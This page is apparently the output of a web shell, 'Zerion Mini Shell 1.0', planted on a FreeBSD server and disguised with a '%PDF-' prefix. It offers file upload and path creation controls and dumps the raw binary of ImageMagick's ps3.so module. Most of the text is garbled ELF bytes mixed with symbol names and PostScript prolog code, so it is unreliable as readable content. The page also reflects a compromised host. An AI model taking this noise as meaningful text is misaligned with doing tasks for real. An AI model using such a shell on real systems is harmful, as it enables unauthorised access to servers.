%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /usr/local/lib/ImageMagick-6.9.12/modules-Q16/coders/
Upload File :
Create Path :
Current File : //usr/local/lib/ImageMagick-6.9.12/modules-Q16/coders/ps3.so

ELF	>B@l@8
@@@@00222BB0303ePPi  fppRtdePPPtdH1H1H144QtdpppFreeBSD "$9GTfq%4ESf{$8N\q
 1>LYmv"
C
0l) < (z3(z3BHBiΟlGDD<1@$=964#8!,;-&+:>(5%.?C2)"0AB	7

' *3/_Jv_RegisterClasses__cxa_finalizeAcquireVirtualMemoryAscii85EncodeAscii85FlushAscii85InitializeCloneImageCloneImageInfoCloseBlobConcatenateMagickStringConstantStringCopyMagickStringDestroyImageDestroyImageInfoDestroyStringFormatLocaleStringFormatMagickTimeGetImageListLengthGetImageOptionGetImagePropertyGetMagickTimeGetNextImageInListGetVirtualIndexQueueGetVirtualMemoryBlobGetVirtualPixelsHuffmanEncodeImageImageToBlobInjectImageBlobLZWEncodeImageLocaleCompareLocaleNCompareLogMagickEventMultilineCensusOpenBlobPackbitsEncodeImageParseAbsoluteGeometryParseGeometryParseGravityGeometryParseMetaGeometryRegisterMagickInfoRegisterPS3ImageRelinquishMagickMemoryRelinquishVirtualMemorySeekBlobSeparateImageChannelSetGeometrySetImageGraySetImageMonochromeSetImageProgressSetImageTypeSetMagickInfoStringToListSyncNextImageInListTellBlobThrowMagickExceptionUnregisterMagickInfoUnregisterPS3ImageWriteBlobWriteBlobByteWriteBlobStringZLIBEncodeImage__assert__stack_chk_fail__stack_chk_guardceilfloormemsetlibm.so.5FBSD_1.0libc.so.7/usr/local/liblibMagickCore-6.so.7libxml2.so.2libfontconfig.so.1libfreetype.so.6libbz2.so.4libltdl.so.7libjbig.so.2libjpeg.so.8liblzma.so.5libz.so.6libwebpmux.so.3libwebpdemux.so.2libwebp.so.7ps3.soBI0I0///, .(*0@-8@-@*H0P0X+`0h"0p+x0"0>08@2HP(X `"h/px%-
'@$&ș!Йؙ:?.89 5(0,81@6H
PX`hpx*#;+	3)ȚКؚA04=<7 (0C0Eo@o@Y@Y@??0C0E?R@??(@-q=CA;9W;W;W;;7<w<VBDDDDD/ByteStreamDecodeFilter
{
  /z exch def
  /r exch def
  /c exch def
  z 0 eq { /ASCII85Decode filter } if
  z 1 eq
  {
    <<
      /K -1
      /Columns c
      /Rows r
    >>
    /CCITTFaxDecode filter
  } if
  z 2 eq { /DCTDecode filter } if
  z 3 eq { /LZWDecode filter } if
  z 4 eq { /RunLengthDecode filter } if
  z 5 eq { /FlateDecode filter } if
} bind def

/DirectClassImageDict
{
  colorspace 0 eq
  {
    /DeviceRGB setcolorspace
    <<
      /ImageType 1
      /Width columns
      /Height rows
      /BitsPerComponent 8
      /DataSource pixel_stream
      /MultipleDataSources false
      /ImageMatrix [columns 0 0 rows neg 0 rows]
      /Decode [0 1 0 1 0 1]
    >>
  }
  {
    /DeviceCMYK setcolorspace
    <<
      /ImageType 1
      /Width columns
      /Height rows
      /BitsPerComponent 8
      /DataSource pixel_stream
      /MultipleDataSources false
      /ImageMatrix [columns 0 0 rows neg 0 rows]
      /Decode
        compression 2 eq
        { [1 0 1 0 1 0 1 0] }
        { [0 1 0 1 0 1 0 1] }
        ifelse
    >>
  }
  ifelse
} bind def

/PseudoClassImageDict
{
  % Colors in colormap image.
  currentfile buffer readline pop
  token pop /colors exch def pop
  colors 0 eq
  {
    % Depth of grayscale image.
    currentfile buffer readline pop
    token pop /bits exch def pop
    /DeviceGray setcolorspace
    <<
      /ImageType 1
      /Width columns
      /Height rows
      /BitsPerComponent bits
      /Decode [0 1]
      /ImageMatrix [columns 0 0 rows neg 0 rows]
      /DataSource pixel_stream
    >>
  }
  {
    % RGB colormap.
    /colormap colors 3 mul string def
    compression 0 eq
    { currentfile /ASCII85Decode filter colormap readstring pop pop }
    { currentfile colormap readstring pop pop }
    ifelse
    [ /Indexed /DeviceRGB colors 1 sub colormap ] setcolorspace
    <<
      /ImageType 1
      /Width columns
      /Height rows
      /BitsPerComponent 8
      /Decode [0 255]
      /ImageMatrix [columns 0 0 rows neg 0 rows]
      /DataSource pixel_stream
    >>
  }
  ifelse
} bind def

/NonMaskedImageDict
{
  class 1 eq
  { PseudoClassImageDict }
  { DirectClassImageDict }
  ifelse
} bind def

/MaskedImageDict
{
  <<
    /ImageType 3
    /InterleaveType 3
    /DataDict NonMaskedImageDict
    /MaskDict
    <<
      /ImageType 1
      /Width columns
      /Height rows
      /BitsPerComponent 1
      /DataSource mask_stream
      /MultipleDataSources false
      /ImageMatrix [ columns 0 0 rows neg 0 rows]
      /Decode [ 0 1 ]
    >>
  >>
} bind def

/ClipImage
{} def

/DisplayImage
{
  gsave
  /buffer 512 string def
  % Translation.
  currentfile buffer readline pop
  token pop /x exch def
  token pop /y exch def pop
  x y translate
  % Image size and font size.
  currentfile buffer readline pop
  token pop /x exch def
  token pop /y exch def pop
  currentfile buffer readline pop
  token pop /pointsize exch def pop
  x y scale
  % Clipping path.
  currentfile buffer readline pop
  token pop /clipped exch def pop
  % Showpage.
  currentfile buffer readline pop
  token pop /sp exch def pop
  % Image pixel size.
  currentfile buffer readline pop
  token pop /columns exch def
  token pop /rows exch def pop
  % Colorspace (RGB/CMYK).
  currentfile buffer readline pop
  token pop /colorspace exch def pop
  % Transparency.
  currentfile buffer readline pop
  token pop /alpha exch def pop
  % Stencil mask?
  currentfile buffer readline pop
  token pop /stencil exch def pop
  % Image class (direct/pseudo).
  currentfile buffer readline pop
  token pop /class exch def pop
  % Compression type.
  currentfile buffer readline pop
  token pop /compression exch def pop
  % Clip and render.
  /pixel_stream currentfile columns rows compression ByteStreamDecodeFilter def
  clipped { ClipImage } if
  alpha stencil not and
  { MaskedImageDict mask_stream resetfile }
  { NonMaskedImageDict }
  ifelse
  stencil { 0 setgray imagemask } { image } ifelse
  grestore
  sp { showpage } if
} bind def
Y>7?GA֓=%.20g %.20g
%g %g
%g
PS36.9.12%%%%Title: %s
BINARY/ReusableStreamDecode filter
Level III PostScript%%%%Creator: ImageMagick %s
%%BoundingBox: (atend)

  %% Labels.
  /Helvetica  findfont pointsize scalefont setfont
2
currentfile %.20g %.20g 5 ByteStreamDecodeFilter
Level III Encapsulated PostScriptcoders/ps3.c%s%%%%BoundingBox: %g %g %g %g
userdict begin
DisplayImage
true
72.0x72.0ASCIIapplication/postscript%%DocumentProcessColors: Black
%%LanguageLevel: 3
/ClipImage {} def
%%Trailer
image != (Image *) NULL612x7923
MemoryAllocationFailedSave/Imageimage_info->signature == MagickCoreSignaturelabel%%DocumentNeededResources: font Helvetica
%!PS-Adobe-3.0 EPSF-3.0
%%PageResources: font Helvetica
image_info != (const ImageInfo *) NULL%%BeginProlog
%%EndProlog
currentfile %.20g %.20g 3 ByteStreamDecodeFilter
WritePS3Image<~01
>%%%%CreationDate: %s
  currentfile buffer readline pop token pop
false
end
unknownSerializeImage%%PageProcessColors: Cyan Magenta Yellow Black
/mask_stream exch def
%.20gx%.20g%d
Save/Imagescurrentfile %.20g %.20g 4 ByteStreamDecodeFilter
`%s'%%PageTrailer
%%PageOrder: Ascend
-1%%EndData
WritePS3MaskImage%%PageProcessColors: Black
ps3:imagemask%%Pages: 1
%%%%Page: 1 %.20g
%.20g %.20g
%s
1image->matte != MagickFalseGROUP4:SerializeImageIndexes%%DocumentProcessColors: Cyan Magenta Yellow Black
  0 y %g add moveto show pop
%%%%PageBoundingBox: %.20g %.20g %.20g %.20g
currentfile %.20g %.20g 0 ByteStreamDecodeFilter
EPS3%%HiResBoundingBox: (atend)
%%EndComments
%%%%BeginData:%13ld %s Bytes
4
5
%!PS-Adobe-3.0
ImproperImageHeadercurrentfile %.20g %.20g 1 ByteStreamDecodeFilter
image->signature == MagickCoreSignature%.20gx%.20g%+.20g%+.20gPS%%%%Pages: %.20g
0
%%%%HiResBoundingBox: %g %g %g %g
GROUP4jpeg%%Orientation: Portrait
8BIM:%%EOF
%.20g
SerializeImageChannel;4P:;<zRx,pAC
J,L @(AC
P'A|0:AC
T,0:AC
MA4;AC
MAUHSPH=ZFtH=iV/H%Cf.HHHHrHH[]@UHH=FtH=Bt
H=B].]UHAWAVAUATSPH=.HL%L`8H=.HCL5#L.HL=L.HC ILk\Hy.LQ.HL`8H=N.HCLB.HL3.HC Lk\H3.H[A\A]A^A_]f.DUHAWAVAUATSHAHDHHEH'IH9pA'IH'I93'A2t-MhH5HL{1-Ix2LLH-#A$uAFH u"LHh-tA~ tH LY-H I$HHH H^HHDHȃAHXHHAHH(fWfWLpHп1fWȾfWf)`fWf)pLHfAf.u{f(ff.uWzUf)H=Hr,
Df(f(ʨtf(fI$HtCf)H,t	f(f(ʨtf(fAufYfXf^f)LL+AN(f(f(%f\f(fXAV0f\f(fXʾHH{+It$(HHp+HH5$l+HHHLLx\+1fWf(f.H
Pf(Ysf.f)	^0^Ip
f\
f(fXYYf)f(X*f(\H,L1H,f.HCHpf(f1fWf.H
vf(Yf.sf(^f(\^x
f\
f(fXYY!f)@f(X%)f(,\H,L1H,f.HCHxHHP)Mx2LHH0L)At,H@1H)HHHXHI+F0HA$f(fT
xfUfVf)LH5Y)HHX)fHnfbf\f(fXYX
f(\H,L1H,f.HCf.IHPI H@fHnfo3fbf(%gf\f(fXfHnfbf\f(fXWI*(WI*0HH'{f.1LHHHfHnfHLHPHHH5(H5H#HDLm'LL'LHH
15'LL'IhLH1
'LL''HHH'LHH1&LLb'WH*H*f(Xf)`f(@ȾXf(
^f\
f(fXXf)pA|$rL
'HaLH5&H5\fDAHH5?&HH5[n
 X&ȾXz&оf(`
X%ؾf(pX%f(ؾLHоؾ*%LL%LHsȾf(`f(p$LL~%A~H5tLL%H5tLR%LH5%HtLH5w/%LH5 %HH5$Lt	H5~H5$LH5+$A|$tAL$fHnfb
f\
Mf(fXLHP#LH5-#LLz$A~uLH5wd$LH5<U$LH5F$LLHg$LH5e#HL-[L~HLH5f#H#H[HHfLcLH5#WI*YXLL#LL#HH6LH#LH5Nk#LLHPHfHnfofbf(f\f(fXLHp"LL#WH*WH*pf(--f(5bf\f(fXXHxfHnfbf\f(fXXپLH!LLy"A~H5tLL"H5tLM"WH*WH*f(ff\f)LH59!HtLH5o!IHtHhH=H,"tLH5[!0@LHe!HLH!L
!HH5DQ!tLH5N!A~ 2I9$pA9I93KA2t8MhH5HaL1A~ (Li!HIǾHHH1L1 LH L$!HHоLؾHwHH
?3HAN(f(f(%f\f(fXAV0f\f(fXʾHH߰cLHLH5L11ҹMu HpIHǾl Lg LZ AG HDžHXH
`HcHH=H5D}LLL~AfDIhLH5HzAL
+1SH,SHA|$LLHH 3HuIhLH5HAL
1SHSbHA|$LOLf.fHH 3Hu,M2MHLDIhLH51HA1SHJSHA|$LLf.@HH 3HuLLLLAuLLHȿHQAHȿH8H0LLM1ېH04LmHI9uLlH8pHȿLLLHȿHDHȿHHLH+~LLHȿHtuHȿHHLH>LLHȿHt5HȿHmHLHAHHȿE1LL
LHH+оHLHILHؾ1qHHHHL1$LHLL1(HLH5LH5QTIhcHH5bHAL
s1SHtSHA|$LLHH 3HuIhfHH5HRAL
1SHSHA|$LLHH 3HuoIhmHH5HAL
1SHS1HA|$LLf.HH 3HuE1ELLLH^HоLH1L1:LLLWHHؾLH5WH*WH*LHIf(f(@f(LLWLH5HHHIHHME13@L8I}IEO,IKDIH uHLH5LIEtfLIEHu!LIEHuL
KLLIHL%L=utHhH=LtLLHH5LIDLAN(f(f(%Pf\f(fXAV0f\f(fXA~H
HVHDȾHHH,LHXA~ LIDLDHH5LHtLL>LIDL
HDž(LA$rA~A>HuSLH5H \H
HcHH5LH59fD tI~@sLH5^H5wH(H
)H4L4AN@
wf\
f(fXHH]LH LI~@z1IFHDLIFHDLIFH؉LHI;^@|Lf.LLuLLF>LH5DH5XHwHH
(H4LLH5LLDȾHH1LH LLLH
dMOA>H5KH5iH5LFI93A2t-Mh
H5HL1E1A~AIMf(Mf0L(LHH
IHHH1LI~0AE1f.IM;~0IN(AL1LMhHXILdA~IN(H1f.ATփ€3ATփ€sATփ€sHփ€sHHI;N(nHe1DALʃс+ALʃсkALʃсkHHI;F(|I 3LIN0LH5L7Aą|=LE-LLIH %
LH(W1f.A4LHH;(|+SH=H5ALLL{
A
I~@1fDIFHDL{IFHDLVIFH؉L2HI;^@|I93	A2t-MhH5tHeLs1_I~0I~(H(5HHIH*I~0HAE1IM;~0}vIN(AL1LMHtWLI~(1fHHI;N(|HI 3uIN0LH5LAąuELLxIH 
L[H(1f.A4LCHH;(|LLHH(8	LLIH t2t
uIH(LL&&H(LLH(LLAQtAVLH(#1A4LsHH;(|LnALpHL
ELHH+ؾH(LHILHо1UHmf(f(ff(@XXXf)f(Xf)LLH_HL1LLR
LL1LH56
HH5
tLH5
]]Ⱦf(_`f)f(_pf)LH5LHLpHпLIHH5_HH t\LA|$Ⱦ()`f(f)pfWHPH5LH
X tXf(
WX&>X	f(HnHH 
LH%HHf(f(O
LH
H5L
L]AE1HHvMhH5HL
E1LA1ARHS4HA|$U@LM 3Mu@MhH5.HDL
EE1LA1ARH4S
HA|$f.@LM 3MuMhH5HL
E1,LA1ARHS^
HHxzfLM 3MucMhH5QHgL
hE1/LA1ARHWS	HHxtLM 3MuL
IhH5HiL
LA1SHS	HHxLtsLHH 3Hu^IhH5HrL
aLA1SHS%	HA|$LtLHH 3Hu	L	E1HHH;EuDHĸA[A\A]A^A_]G
H=WH5H
8
H=8H5ʿH
.
H=H5H
x	H=H5H
	H=lH5mH
	H=rH5NH
v	H=SH5/H
8w~	H=4H5H
Կx_	H=H5H
Uy@	UHH=@	H=]3	UHAWAVAUATSHIHHHEHuLx2E1H11ҹMHILIHHH1H5DHHH5"HUHLLILHLMt#HuH}LUE1H;EALHH;EuDH[A\A]A^A_]fUHAWAVAUATSH(HUHIH93IH}A2t-MhH5nHLmT1OIx2LH]1E̅HD@LbM}(MvILI}0IHI>HMHHYH]HAI}0HEIM(AL11LMH1HMMI%IW5:=:f}MH]<11$11f@ҍVHLtuI9I;M(}tW*tW*YYX4W*YX.f.ZX,uH1I9f.I}(H]~x11҃ꀉ)4HI;M(}TTW*TW*YYXW*YX.vf.sZX,듐HH]IM0LH5H]H/AHI;]0IM(AL1H]HLMHtp%pW5a=a#MhLH5yHL
YE1[HA1ARASHHEЃxtLM 3MuLH]H;THE1DH([A\A]A^A_]H=H5H
Q=H=H5ϹH
3RUHSPHSHHHHrHH[]HHHH5j'%l'@%j'h%b'h%Z'h%R'h%J'h%B'h%:'h%2'hp%*'h`%"'h	P%'h
@%'h0%
'h %'h
%&h%&h%&h%&h%&h%&h%&h%&h%&h%&hp%&h`%&hP%&h@%&h0%&h %&h%z&h%r&h%j&h %b&h!%Z&h"%R&h#%J&h$%B&h%%:&h&%2&h'p%*&h(`%"&h)P%&h*@%&h+0%
&h, %&h-%%h.%%h/%%h0%%h1%%h2%%h3%%h4%%h5%%h6%%h7p%%h8`%%h9P%%h:@%%h;0%%h< %%h=%z%h>%r%h?FUjw)<@	oX
o		q
qoop	oqqqqrr&r6rFrVrfrvrrrrrrrrrss&s6sFsVsfsvssssssssstt&t6tFtVtftvtttttttttuu&u6uFuVufuvuuuuuFreeBSD clang version 11.0.1 (git@github.com:llvm/llvm-project.git llvmorg-11.0.1-0-g43ff75f2c3fe)Linker: LLD 11.0.1 (FreeBSD llvmorg-11.0.1-0-g43ff75f2c3fe-1300007)$FreeBSD$.shstrtab.note.tag.dynsym.gnu.version.gnu.version_r.gnu.hash.hash.dynstr.rela.dyn.rela.plt.rodata.eh_frame_hdr.eh_frame.text.init.fini.plt.ctors.dtors.jcr.init_array.data.rel.ro.dynamic.got.data.got.plt.commentpp`o+op	p	@:o		$D		(JRB@\BXXf2``nH1H14|11B2.qaqaqaeЅeeeefphii00kk

Zerion Mini Shell 1.0